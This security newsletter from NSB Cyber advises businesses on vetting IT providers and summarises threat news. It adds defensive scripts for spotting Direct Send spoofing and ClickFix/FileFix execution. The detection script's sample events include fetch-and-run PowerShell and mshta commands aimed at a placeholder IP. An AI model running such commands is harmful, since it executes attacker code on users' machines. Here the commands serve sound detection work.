#NSBCS.081 - Is Your IT Provider Really Protecting Your Business? A Cybersecurity Reality Check
Source: NSB Cyber
Is Your IT Provider Really Protecting Your Business?
Your business depends on technology, but here's an uncomfortable truth: not all IT Managed Service Providers (MSPs) are equipped to handle today's cybersecurity threats. Many excel at keeping your computers running and your email flowing, but struggle when it comes to comprehensive cyber protection.
Most businesses assume their IT provider has cybersecurity covered. After all, they're the technology experts, right? Unfortunately, many traditional IT MSPs focus primarily on:
Managing subscriptions and enabling operational technologies;
Hardware maintenance and repairs;
Software updates and patches;
Network connectivity issues; and
Antivirus installation.
What they often miss are the sophisticated, multi-layered security strategies that modern cyber threats require. A truly cyber-ready MSP should provide:
Comprehensive Protection Strategy: Your MSP should implement multiple layers of security, including endpoint protection, identity protection, email security, network monitoring, logging and backup solutions. They should also conduct regular vulnerability assessments and penetration testing.
24/7 Security Operations: Cyber threats don't follow business hours. Your MSP should have round-the-clock monitoring capabilities, either in-house or through a trusted Managed Security Service Provider (MSSP) that operates a Security Operations Center (SOC).
Incident Response: Not if, but when a security incident occurs, your MSP should have a tested, documented response plan. They should be able to contain threats quickly, minimise damage, and restore operations with minimal downtime.
Regular Security Education: Your MSP should not only provide ongoing cybersecurity awareness training for your team but also maintain a high standard of security awareness within their own organisation.
If an MSP lacks these capabilities, it’s not a dealbreaker — they can partner with specialised MSSPs to fill gaps. The key is transparency and a clear plan to address your cybersecurity needs. Here are some actionable steps to consider with your MSP:
Request a Cybersecurity Roadmap: Ask your current or prospective MSP for a detailed cybersecurity roadmap, including specific tools (e.g., SIEM, EDR), processes (e.g., patch management), and incident response strategy.
Verify MSSP Partnerships: If the MSP relies on an MSSP, request details about the partner’s credentials, SOC capabilities, and service-level agreements (SLAs) to ensure robust coverage.
Conduct a Security Audit: Engage a third-party cybersecurity firm to assess your current MSP’s setup and identify gaps in protection, monitoring, or response capabilities.
Review Training Programs: Confirm the MSP offers regular, tailored cybersecurity training for your team, including phishing simulations and best practices for secure remote work.
Test Incident Response: Ask the MSP to walk you through a recent incident response case study or conduct a tabletop exercise to demonstrate their preparedness.
By prioritising a cyber-ready MSP or supplementing with specialised providers, you can safeguard your business against evolving threats. Start with these actionable steps to ensure your technology partner aligns with Australia’s cybersecurity standards and take #NoStepsBackwards.
What we read this week
Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns - Cybersecurity experts warn that a large number of phishing emails with PDF attachments trick victims into calling phone numbers controlled by attackers, a tactic known as Telephone Oriented Attack Delivery (TOAD) or callback phishing. Between May 5 and June 5, 2025, analysis showed Microsoft and DocuSign were the most impersonated brands in these TOAD emails, with NortonLifeLock, PayPal, and Geek Squad also frequently used to deceive victims. Additionally, threat actors are exploiting Microsoft 365’s Direct Send feature to send phishing emails from spoofed internal addresses, abusing artificial intelligence (AI) tools to steer users to malicious sites, and injecting code into compromised legitimate domains to manipulate search results in favour of phishing pages, undermining brand integrity and user trust.
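The Direct Send abuse described above leaves a recognisable trace in message headers: an internal From: domain, delivered to the tenant's inbound edge by a host that is not one of the organisation's known relays, with neither SPF nor DKIM passing. The triage script below is an added example for this newsletter and is not code from the cited article or from Microsoft; the tenant domain, the trusted relay range and both raw messages are constructed for the demonstration.

```python
"""Header triage for Microsoft 365 'Direct Send' spoofing.

Added example for this newsletter issue; it is not code from the cited article
or from Microsoft. The tenant domain, trusted relay range and the two raw
messages below are constructed for the demonstration.
"""
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Assumed tenant configuration (hypothetical values).
INTERNAL_DOMAINS = {"contoso.com"}
# Hosts allowed to hand mail with an internal From: to the tenant MX without
# SPF/DKIM, e.g. an on-premises relay. Assumed range; populate from your tenant.
TRUSTED_RELAYS = [ipaddress.ip_network("198.51.100.0/28")]

# Constructed sample 1: an internet host delivering straight to the tenant's
# MX (the Direct Send path) with an internal From: and failed authentication.
SAMPLE_DIRECT_SEND = """\
Received: from mail.example.net (unknown [203.0.113.25])
 by contoso-com.mail.protection.outlook.com with SMTP; Mon, 7 Jul 2025 09:12:01 +0000
Authentication-Results: spf=fail (sender IP is 203.0.113.25)
 smtp.mailfrom=contoso.com; dkim=none (message not signed) header.d=none;
 dmarc=fail action=oreject header.from=contoso.com; compauth=fail reason=000
From: "IT Helpdesk" <helpdesk@contoso.com>
To: alice@contoso.com
Subject: Voicemail received - call back required

You have a new voicemail. Call +1 555 0100 to retrieve it.
"""

# Constructed sample 2: the same message, but relayed by the trusted on-prem
# host with SPF passing, as legitimate internal mail would look.
SAMPLE_LEGIT = (SAMPLE_DIRECT_SEND
                .replace("203.0.113.25", "198.51.100.5")
                .replace("spf=fail", "spf=pass")
                .replace("dmarc=fail action=oreject", "dmarc=pass"))

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc|compauth)=(\w+)", re.I)
BRACKET_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def auth_results(msg):
    """Collapse Authentication-Results into {'spf': 'fail', 'dkim': 'none', ...}."""
    results = {}
    for header in msg.get_all("Authentication-Results", []):
        for key, value in AUTH_RE.findall(header):
            results.setdefault(key.lower(), value.lower())
    return results


def connecting_ip(msg):
    """IP that handed the message to the tenant's inbound edge (EOP)."""
    for received in msg.get_all("Received", []):
        if "mail.protection.outlook.com" in received:
            match = BRACKET_IP_RE.search(received)
            if match:
                return ipaddress.ip_address(match.group(1))
    return None


def analyse(raw_message):
    """Return the fields an analyst looks at plus a Direct Send verdict.

    Verdict logic: an internal From: domain, delivered by a host outside the
    trusted relay ranges, with neither SPF nor DKIM passing.
    """
    msg = message_from_string(raw_message)
    _, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    auth = auth_results(msg)
    ip = connecting_ip(msg)
    internal_sender = domain in INTERNAL_DOMAINS
    authenticated = auth.get("spf") == "pass" or auth.get("dkim") == "pass"
    trusted = ip is not None and any(ip in net for net in TRUSTED_RELAYS)
    return {
        "from": addr,
        "source_ip": str(ip) if ip else None,
        "spf": auth.get("spf", "missing"),
        "dkim": auth.get("dkim", "missing"),
        "dmarc": auth.get("dmarc", "missing"),
        "suspected_direct_send": internal_sender and not trusted and not authenticated,
    }


if __name__ == "__main__":
    for name, raw in (("direct-send", SAMPLE_DIRECT_SEND), ("legit", SAMPLE_LEGIT)):
        print(name, analyse(raw))
```

Run against a mailbox export or a SIEM's message-trace feed, the verdict is a hunting filter rather than a block decision: a legitimate on-premises scanner that was never added to the relay list will fire too, which is exactly the inventory gap to fix. The tenant-level control is Exchange Online's Reject Direct Send organisation setting (Set-OrganizationConfig -RejectDirectSend $true in Exchange Online PowerShell), applied once every legitimate internal sender has been moved onto an authenticated connector.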
Citrix Warns of Login Issues after NetScaler Auth Bypass Patch - Citrix has warned that applying recent patches for critical vulnerabilities on NetScaler ADC and Gateway appliances might cause login pages to break, particularly when certain authentication methods are used. This issue stems from a new default setting that enables the Content Security Policy (CSP) header, designed to block malicious scripts but which can also interfere with legitimate scripts in custom identity provider (IDP) configurations. The critical vulnerabilities being patched include one (CVE-2025-5777, or Citrix Bleed 2) that allows attackers to hijack user sessions, and another (CVE-2025-6543) that is exploited in denial-of-service attacks. Citrix advises administrators to temporarily disable the CSP header and clear the cache to restore normal login functionality.
FileFix Attack Chain Enables Malicious Script Execution - A security researcher has identified a new attack chain, called FileFix, that lets attackers execute malicious scripts on Windows systems while bypassing the Mark of the Web (MoTW) protection. The attack builds on the ClickFix technique, which tricks users into copying and running malicious commands by presenting fake errors and reCAPTCHA challenges on compromised websites, a tactic previously seen infecting thousands of WordPress sites. The security researcher demonstrated how attackers use phishing pages to convince victims to copy a malicious PowerShell command and paste it into Windows, or save an HTML page renamed as a .HTA file, which executes harmful scripts automatically via mshta.exe without triggering security warnings. This works because HTML files saved as “Webpage, Complete” don’t carry the MoTW tag, letting scripts run unhindered. To protect against these attacks, users should disable or remove mshta.exe, enable file extension visibility, block HTML attachments in emails, and stay cautious of unsolicited messages.
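The two execution chains described above reduce to process-creation patterns a SOC can hunt for: mshta.exe opening an .hta that sits where a browser "Save as" or download would put it (FileFix, where the file carries no Mark of the Web), and an interpreter spawned by explorer.exe with fetch-and-run content (ClickFix pasted into the Run dialog). The rules below are an added example for this newsletter, not code from the cited research; the event records are constructed in a simplified Sysmon Event ID 1 shape and every path, host and user name is made up.

```python
"""Process-creation rules for ClickFix / FileFix execution chains.

Added example for this newsletter issue; not code from the cited research.
The records below are constructed in a simplified Sysmon Event ID 1 shape
(Image, CommandLine, ParentImage, User); paths and user names are made up.
"""
import re

# Interpreters a pasted one-liner or a saved .hta ends up in.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Where a browser "Save as" or download lands. Assumed; tune per fleet.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Downloads|Desktop|Documents|AppData\\Local\\Temp)\\", re.I)
# Fetch-and-run markers typical of ClickFix clipboard payloads.
REMOTE_EXEC = re.compile(
    r"(\biwr\b|invoke-webrequest|downloadstring|invoke-expression|\biex\b|"
    r"-enc(odedcommand)?\b|https?://)", re.I)
HTA_ARG = re.compile(r"\.hta\b", re.I)

# Constructed sample telemetry.
EVENTS = [
    # 0: FileFix - page saved from the browser as verify.hta, then double-clicked.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\Downloads\verify.hta"',
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\alice"},
    # 1: ClickFix - one-liner pasted into the Run dialog (explorer is the parent).
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://203.0.113.9/x | iex"',
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\bob"},
    # 2: benign - scheduled inventory script run by an RMM agent.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\Agent\inventory.ps1",
     "ParentImage": r"C:\Program Files\Agent\agent.exe", "User": r"NT AUTHORITY\SYSTEM"},
    # 3: ClickFix variant - mshta pointed straight at a URL.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta https://203.0.113.9/captcha.mp4",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\carol"},
    # 4: benign legacy HTA shipped under Program Files by a vendor installer.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\LegacyApp\console.hta"',
     "ParentImage": r"C:\Program Files\LegacyApp\LegacyApp.exe", "User": r"CORP\dave"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the rule tags that fire for one process-creation event."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    tags = []
    if image == "mshta.exe":
        # FileFix: an .hta living where a browser save or download would put it.
        # Such a file carries no Mark of the Web, so no warning was ever shown.
        if HTA_ARG.search(cmd) and USER_WRITABLE.search(cmd):
            tags.append("filefix_hta_from_user_dir")
        # Classic ClickFix: mshta fetching its payload from a URL.
        if re.search(r"https?://", cmd, re.I):
            tags.append("clickfix_mshta_url")
    if image in SHELLS and parent == "explorer.exe" and REMOTE_EXEC.search(cmd):
        # Interpreter started from the Run dialog / Explorer address bar with
        # download-and-execute content: the user pasted something.
        tags.append("clickfix_explorer_spawn_remote_exec")
    return tags


def scan(events):
    """Alerts as (event index, user, tags) for every event with at least one tag."""
    alerts = []
    for index, event in enumerate(events):
        tags = classify(event)
        if tags:
            alerts.append((index, event["User"], tags))
    return alerts


if __name__ == "__main__":
    for index, user, tags in scan(EVENTS):
        print(f"event {index} {user}: {', '.join(tags)}")
```

Event 4 is there to show why the user-directory condition matters: a vendor HTA under Program Files is noise, and blanket alerting on mshta.exe would bury the real hit in event 0. Detection complements rather than replaces the preventive control the article recommends, which is blocking mshta.exe outright (for example with an AppLocker or WDAC rule) where nothing in the estate depends on it.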
The United States Warns of Iranian Cyber Threats on Critical Infrastructure - United States (U.S.) cyber agencies have issued a warning about potential cyberattacks by Iranian-linked hackers against critical infrastructure, particularly in light of ongoing Middle East tensions. While there is no current evidence of active attacks, organisations in sectors like energy, water and healthcare, and especially those in the Defense Industrial Base with Israeli ties, are urged to stay vigilant. Iranian threat actors have previously exploited unpatched vulnerabilities and default passwords, as seen in the November 2023 breach of a Pennsylvania water facility. These actors also engage in distributed denial-of-service (DDoS) attacks, website defacements, and ransomware campaigns. Authorities recommend isolating critical systems from the internet, using strong passwords with multi-factor authentication (MFA), promptly applying software updates, and monitoring for suspicious activity.
References
https://thehackernews.com/2025/07/hackers-using-pdfs-to-impersonate.html
https://www.bleepingcomputer.com/news/security/citrix-warns-of-login-issues-after-netscaler-auth-bypass-patch/
https://www.darkreading.com/threat-intelligence/filefix-attack-chain-malicious-script
https://www.bleepingcomputer.com/news/security/us-warns-of-iranian-cyber-threats-on-critical-infrastructure/